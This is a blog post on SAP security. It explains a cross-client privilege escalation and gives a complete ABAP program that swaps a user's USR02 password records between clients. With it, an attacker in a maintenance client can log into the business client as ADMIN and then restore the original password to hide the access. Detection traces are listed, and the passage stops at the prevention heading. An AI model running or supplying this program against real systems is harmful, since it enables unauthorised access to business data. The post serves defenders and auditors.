Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.
Questions that will be answered in this blog are:
- How to execute a cross client access hack?
- How to detect this attack?
- What preventive measures should I take to prevent this in my systems?
Cross client hack explained
You have gained access to a maintenance client by any method (most easy is standard users: see blog on this topic). Some basis and security people will waive this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored into a different client”.
So what the hacker will do is simple open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:
REPORT ZSWAPUSER. data: zls_usr02_1 type usr02. data: zls_usr02_2 type usr02. data: zls_usr02_t type usr02. parameters p_uname1 type usr02-bname. parameters p_mandt1 type sy-mandt. parameters p_mandt2 type sy-mandt. select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. write sy-subrc. zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. modify usr02 client specified from zls_usr02_t. write sy-subrc.
In the source client hacked a new user will be created. Let’s say the user ADMIN, which is also existing in the target client. The hacker creates the user ans sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..
After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.
Detecting this attack
Detecting this attack directly is very difficult. There are traces:
- Client opening and closing in the source client
- The presence of the ABAP code
- The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t read this blog how to do it and execute it!)
- ADMIN access from same terminal as the hacker is using to logon to the source client
Preventive measures
The following preventive measures can be taken: